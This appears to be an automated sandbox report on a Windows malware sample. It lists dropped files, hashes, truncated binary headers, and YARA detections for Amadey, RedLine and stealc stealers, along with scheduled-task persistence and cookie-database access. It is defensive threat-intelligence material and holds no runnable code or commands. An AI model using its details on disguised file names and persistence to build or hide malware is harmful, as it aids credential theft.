SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Reputation:	unknown
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\Viruses

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	7.998050392538849
Encrypted:	true
SSDEEP:
MD5:	7C9DD6F9FA719321B72805DF762A82DA
SHA1:	64B135116D963E47848E29A002A3207BC01AB2C0
SHA-256:	98232A6528BEB079D8FA9D77751722159D4974E6859DF867EFB3BA7A3EEC4BEC
SHA-512:	480D16E0D1E5021B9042378DF235323324FC8341461E59D117471AA0DA07FE8EF6367D0E14479B4BBB854F29D1F092BA3E9776FA2BF56B34AB73F5A858E6B3D0
Malicious:	false
Reputation:	unknown
Preview:	\.....W.......BLa...U...A..BG8N....b.y%`<...^. o.....)..2Lv.V...x...$...0......}O..M/#W&."wD%%u..A{$.'c....s........`..."......l..X....'...:t.yk.....!.T.-.1r..FW>.:.V.,..^....-wEe7..x...4.d>Q...)-q......'....J......C#..3y;..:-eB./c'...=...mz,Zm. ..[....)\..d..WC....Vo.w..l...>Qf..{<...Ow 5.-w.JR....:I.s.Z.8...w?./..2S...h.J#S.......s.....;...h.w>.CP............S....F .E..A....k.w.BwS.'s>s-$...$..'....39..I=T.PP...b..B.b....B8.."....zO.^.!.>...r.^".....p.n6..CbZW......!............O..@z..7s.a.<..w.Hn9.....g......;./.-....M .fR.q-Mk..g.#.G~2D.....T.....A.+.e.oMr..H8..nP....-Hw..".+.fhN.).`%.h?..H..!c.4..7^'.......\|..e.2"...$..J?h.2z..T...m....i..D..E...&a...G..f;z.H.x.[""y^<....D.._.S.LU..(...8......8.^1w.9/L;w.....L.\....J.`...&...n.#..e[.'5..;D.nY..,.....m<.d...X..>8.s-......1....=.....S.#......!iOF...9.%.......]5}...b...Q..gO?o.mU..3...S.BeI\...v..N.r.n...$..t.....]?...sND.. .....s..v.....R..G.......&Y...`.....^..%.. .35..6....c.

C:\Users\user\AppData\Local\Temp\Width

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	69515
Entropy (8bit):	7.997466121402968
Encrypted:	true
SSDEEP:
MD5:	12D9AD507C856D833101C9E367466555
SHA1:	B6398B345226279CFAB1559BF3847E3D9526DCFF
SHA-256:	8E7415ED2D0D5C6E69D6A02BC3928C9ADF685A43932E4543084B917946361974
SHA-512:	0BA3913D4A3CA266F0812263245A25CAA0BBD9B81766992C8DC05466D9CD86CB79843C53C29BB26C005EF15C0F90AB97978209038181501135A7B27FB5B34D62
Malicious:	false
Reputation:	unknown
Preview:	-R..E..b..(yuE.5Z.'......x......Su..~...u...=D.......?K.F.TM......K...ed.>7.s...^."H..7F.{.GC,.i<I.5..8>.N.@2........a....v[..0j.7={.......J.6/.z.h....~gX}......Q.+.......!y.......F.....<7.'.+..f}=....i'.Tx.\$.^.........x...!'....IQ..L.O..g.[.N4.7<E....}%....\....u.]\.........^..ij8.K.gv......h~...y.,......3x.q.%.P%":$:>VV....'Ol..Dc.H.z.....D....t8...s.......y.......$.r.Y....`.N....h...W.>.0....(..$hq.p..T....'.4..[2.Q..E......../.+.NM.@.G=..t..~hh.&......1F..c...'7!.I.hx....P...g.........1RKujV.....7..\.Pa.)..}.v..&...O...\|M.-...Z.........0...V#.&..\|.-..>2.-:.K..v;.pn...w..'.L.2.wx$H.f.4..w......s.@j.1_.;\|.....9O....nH2.}D..k...........9.=.....-.l.sa.7).#.q.........V..L......i..w..;......4......<....H....(v_.5.......0 .v8.v?=,..~.B7.r..1.}..t.9...U$.G..Y........R.J..A...$.>B....m..-..%#...p3....Y..>>.?......q?..#...................F}/5%..56....5I.....g-3.t."..:..'...ER8...8..PVZx.R...:.]...}....x..=q>....[s2....'...+.C.j.....M..=.....

C:\Users\user\AppData\Local\Temp\service123.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	63438848
Entropy (8bit):	0.00954006470112793
Encrypted:	false
SSDEEP:
MD5:	E725F9D9D1A4FF9A4A5E12E4D3BA360C
SHA1:	490F79DF1755FE65E746AE8C0CA80D807067AE5E
SHA-256:	C7460FEB273D5403565A1F8EC72B09466D4308BB845C4EC8FD05859B9CF8B53F
SHA-512:	5BE302E7E76829F97F94C5FB3CF740D1125CE833CD58CCD4494114A4CA7F0E4E8202084E68C8C3CD1B95180D7C05D27CB37CF7CDDC898A4146E85DD7FE7B6BAA
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.f...............#.v........................@.......................................@... .................................................................h...................................................X................................text....u.......v..................`.P`.data...X............z..............@.0..rdata..X............\|..............@.`@.eh_fram............................@.0@.bss..................................`..idata..............................@.0..CRT....4...........................@.0..tls................................@.0..reloc..h...........................@.0B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\svchost015.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2990472
Entropy (8bit):	6.459856200541649
Encrypted:	false
SSDEEP:
MD5:	B826DD92D78EA2526E465A34324EBEEA
SHA1:	BF8A0093ACFD2EB93C102E1A5745FB080575372E
SHA-256:	7824B50ACDD144764DAC7445A4067B35CF0FEF619E451045AB6C1F54F5653A5B
SHA-512:	1AC4B731B9B31CABF3B1C43AEE37206AEE5326C8E786ABE2AB38E031633B778F97F2D6545CF745C3066F3BD47B7AAF2DED2F9955475428100EAF271DD9AEEF17
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....\"f..................#.........l.#.......#...@..........................p1.....?.-...`...(..@...........................p&.l3....(...............-..!....................................&.....................................................CODE......#.......#................. ..`DATA....0.....#.......#.............@...BSS...........$......\$..................idata..l3...p&..4...\$.............@....tls....\|.....&.......$..................rdata........&.......$.............@..P.reloc.......&.......$.............@..P.rsrc.........(.......$.............@..P.............p1......,/.............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\wZcULqdrBkDQvQgfGRYD.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315835392
Entropy (8bit):	0.055762616703590825
Encrypted:	false
SSDEEP:
MD5:	5A7798A790CC653F071C2AAB49DCDBFA
SHA1:	98EAE25BBC25E3B0C7078EA267E23C071F08556F
SHA-256:	C341C2DEB8019ADF22BC83A01C6A0C9ED9BFF7E37C47277EBEEE351A4DD1B5B7
SHA-512:	144F78F8DC78CE82B044ABCA9BCB5E767B71E4D6B6A7CF6D2FBEAB6BD0D19064D47AA235AF703D81D78374BEB4A35158581D14E8AEF41A245EED0FD37C315EE8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.f...........#...#.H...@...............`....<m......................................@... .........................`....................................0..........................................................t............................text...LF.......H..................`.P`.data........`.......L..............@.`..rdata..@............b..............@.`@.eh_fram.....P.......&..............@.0@.bss....t.............................`..edata..`...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls......... ......................@.0..reloc.......0......................@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\13ea046e647bb8e29b85781ced2af533_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\AppData\Roaming\u3uP67496d.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\d3d9.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000285001\2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	547328
Entropy (8bit):	7.041251556013102
Encrypted:	false
SSDEEP:
MD5:	A6DA8D868DBD5C9FE6B505DB0EE7EB71
SHA1:	3DAD32B3B3230AD6F44B82D1EB1749C67800C6F8
SHA-256:	4AD69AFB341C6D8021DB1D9B0B7E56D14B020A0D70739E31F0B65861F3C4EB2C
SHA-512:	132F54AC3116FD644C57840C893DAE2128F571A784CEAA6DD78BAFA3E05FC8F2A9D2458F1E1CF321B6CECC2423D3C57FF6D3C4B6B60F92A41B665105A3262DD0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'..f...........!...&............}.......@............................................@.........................@...T.......<............................p..l.......................................@............@..P............................text...#(......................... ..`.rdata..2h...@...j..................@..@.data...\...........................@....nGf....P........................... ..`.reloc..l....p.......>..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\u3uP67496d.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	311296
Entropy (8bit):	5.082543579488037
Encrypted:	false
SSDEEP:
MD5:	4E60F3FD76D9EAB244F9DC00F7765B0B
SHA1:	1A154D6E837E7105C551793131CDE89F157C4330
SHA-256:	D6945846CC23C01B9C9AD2B97D35B5A14C01F1A4CC2EC651A596F06777BA4FEC
SHA-512:	44727E25781F448579AC35AAB94AFF550ED9FE5AC58D95BD394569C62892DC78216AC687BAA43CEF66187EBE629F5DD9CD63EA274222D11DBEF3440EC4D7F77A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ................0................. ... ....@.. ....................... ............@.....................................O.... ..............................h................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\weX3lQ8AOU.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	364544
Entropy (8bit):	6.656062545289343
Encrypted:	false
SSDEEP:
MD5:	A3EF9920A91B891837705E46BB26DE17
SHA1:	9CFBCD0F46EC86FB57D3D6D74A064F9098ADF117
SHA-256:	171CEF885F6C285E995CE3EC5960C5EA4E4ED049CEC362745058FEE39E4136CC
SHA-512:	C65E91091B95C3ABA0AF7DF4ED6543D26BCB5B54D6FAB82F9D2AC1BA156F475F98124A1A0E8851D69BE23B1DC945C76C075CD32515203273260802E1224DBD6E
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....#.f..........................................@..........................P............@.....................................x................................J...................................................................................text...~........................... ..`.rdata...).......*..................@..@.data............b..................@....reloc...J.......L...D..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\Opportunistic Telegraph\acentric.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	464896
Entropy (8bit):	5.410841803375821
Encrypted:	false
SSDEEP:
MD5:	37D198AD751D31A71ACC9CB28ED0C64E
SHA1:	8EB519B7A6DF66D84C566605DA9A0946717A921D
SHA-256:	1ED4A8B4C74AAB435EA5CD459D5AC961E5A8CA28924801BD84D336135F30EFDE
SHA-512:	60923C0A8CE5FD397D49749CCEE68CA3FE294D7323551CE9755410AC16BFFF56A35BEE3E6B9A67D57CDFCB43E4F164712F33CD255B76689174DCF4C475976C96
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.........."...0..L..........vk... ........@.. ....................................`.................................$k..O............................`.......i............................................... ............... ..H............text...\|K... ...L.................. ..`.rsrc................N..............@..@.reloc.......`......................@..B................Xk......H.......(6...,...........b..0............................................0..I........~....}.....(.... ....(.....(.... <...(.....{....r...po...........o....&....0...........('..... .u.5C. .w)F5.. C..6;..... .w)F.}8M.... .d?^;..... c...P. .u.;....8.... .O..5.. .np.;..... .O...v8..... R,...W. ..G.;..... B.J../8.....r...p(....:....8.....r'..p(....:....8.....r-..p(....:....8.....r5..p(....-t8.....r9..p(....-h8.....rC..p(....-\+x.rM..p(....-S+i.rU..p(....-J+Z.r_..p(....-A+K.rg

C:\Windows\Tasks\Hkbsse.job

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe
File Type:	data
Category:	dropped
Size (bytes):	278
Entropy (8bit):	3.3885700749296572
Encrypted:	false
SSDEEP:
MD5:	1AEBE6A36244F8EDF5E6ED05F7B4D196
SHA1:	665BEA378CE0518C4CBB99880EF6F4A86FB6B292
SHA-256:	86D3C16AE49F409C92BEEC34D220C512C7FCBAD8C4A91FDA5FE2B4A7CB1A99E4
SHA-512:	83575E52F679B327673D977CDA6528DB36D5B75CB4F727D97333DEC866F02688FCFD6395B3BA369D9EE0FF50FC77319798DD17E6CB33920FF852B29FC8115FEF
Malicious:	false
Reputation:	unknown
Preview:	.......U.\.K......qF.......<... .....s.......... ....................7.C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.5.4.f.d.c.5.f.7.0.\.H.k.b.s.s.e...e.x.e.........T.I.N.A.-.P.C.\.t.i.n.a...................0...................@3P.........................

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	3.3766525093405146
Encrypted:	false
SSDEEP:
MD5:	7FB83D24B924EF6F7FC5B325659615C2
SHA1:	374DD1D865441E3026179E1DA36057EAA9DB9CE5
SHA-256:	8CBCA9235CE4149D7A3DED7E4F1A4C610949D4FE6B4C34EE13F18F5785091C5C
SHA-512:	038B755C6659A4F04A2DECBC20CB82C9675751DE814BE9095CB0480B5D3E874EAEE4614D3024BE4AA3FCA7E51C67B196735E3E9EA9597B2324A7A876BCE6FDC4
Malicious:	false
Reputation:	unknown
Preview:	....n...O.WI.3!..L..F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........T.I.N.A.-.P.C.\.t.i.n.a...................0...................@3P.........................

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1521
Entropy (8bit):	4.0582807278312805
Encrypted:	false
SSDEEP:
MD5:	96A03FB0F9589979DF9B62B9FE536417
SHA1:	AE5B8D04503E57E4C0A9A3CE97EBB2CB0701FCC7
SHA-256:	A6DD11EEE65CEB666A81C85FAB6F66B0B2B482097D9EFB47DE414BAE35EEFC89
SHA-512:	A36CD41D58E5217169A051A24D8731A45B79476695ABB1655E70D35997FC52B9C9336486EE7F3355DC03498ACFC58B501D2DB8292FEC537C577AED7E925C4D77
Malicious:	false
Reputation:	unknown
Preview:	Person 0..29..Person 1..24..Person 2..28..Person 3..106..Person 4..92..Person 5..24..Person 6..63..Person 7..56..Person 8..13..Person 9..103..Person 10..36..Person 11..47..Person 12..58..Person 13..94..Person 14..82..Person 15..65..Person 16..19..Person 17..35..Person 18..46..Person 19..73..Person 20..53..Person 21..1..Person 22..31..Person 23..90..Person 24..34..Person 25..97..Person 26..44..Person 27..82..Person 28..31..Person 29..52..Person 30..99..Person 31..47..Person 32..2..Person 33..65..Person 34..28..Person 35..17..Person 36..103..Person 37..1..Person 38..50..Person 39..60..Person 40..6..Person 41..80..Person 42..85..Person 43..24..Person 44..57..Person 45..41..Person 46..16..Person 47..78..Person 48..106..Person 49..90..Person 50..72..Person 51..89..Person 52..5..Person 53..106..Person 54..104..Person 55..27..Person 56..101..Person 57..45..Person 58..71..Person 59..103..Person 60..87..Person 61..88..Person 62..24..Person 63..68..Person 64..4..Person 65..96..Person 66..44..Per

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.949669975421745
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'925'120 bytes
MD5:	cb1a17efda5be9d8d7ce9fe5903812da
SHA1:	d1b00bb0b02d27538eca9a2788f84e93cec9cf78
SHA256:	d558e3e2afe0bbfa36ae7020c052e1a0077c45e172d643e8f0af0aa617c35875
SHA512:	a000e40ddcc6033e1962d3528881268321bac6e6681ca98ec4c6cefd5f20d0d574ed2092dc8b14b9b7fbeceea0fc9de5b4649a17112fbaaa8c16f9d092368369
SSDEEP:	24576:uIihqFaIBf8u8bU1OcKusr3KeFnd7EnMYvMV6/t6aGMsZ9QmrKSkYbQlj9CQX/6A:uIZUu8cKfxZvY0s8VMCKwKQQCjD1Im
TLSH:	2395335DB2818029C8C440B77DA7A087F7FA60156CEDC6CCE6198BF485F3B972A74B52
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8c7000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F4DA4BB40FAh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4c5388	0x10	ifufhtja
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4c5338	0x18	ifufhtja
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	0f500813f245132f9b9dca2194d23e2d	False	0.9974455040871935	data	7.984869824803828	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	aa8b374561a724e9735fa81d0b662e76	False	0.580078125	data	4.535592725559805	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2b6000	0x200	55485c32a1b5d34ff59197ca99f9b806	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ifufhtja	0x321000	0x1a5000	0x1a4600	0d5602dd131558c299b36a88eec02fe1	False	0.9943735132322331	data	7.953498152994367	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wxnzvpao	0x4c6000	0x1000	0x400	38e49136771ae3ab99c55c83c982d122	False	0.8212890625	data	6.311929088057178	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4c7000	0x3000	0x2200	c500b56e205509117b196b54cc03769b	False	0.06904871323529412	DOS executable (COM)	0.893791901249051	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4c5398	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	0
Start time:	00:01:59
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x870000
File size:	1'925'120 bytes
MD5 hash:	CB1A17EFDA5BE9D8D7CE9FE5903812DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1364464684.0000000005080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1404879841.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:02:02
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0x210000
File size:	1'925'120 bytes
MD5 hash:	CB1A17EFDA5BE9D8D7CE9FE5903812DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1394024866.0000000004980000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1434414768.0000000000211000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:02:03
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x210000
File size:	1'925'120 bytes
MD5 hash:	CB1A17EFDA5BE9D8D7CE9FE5903812DA
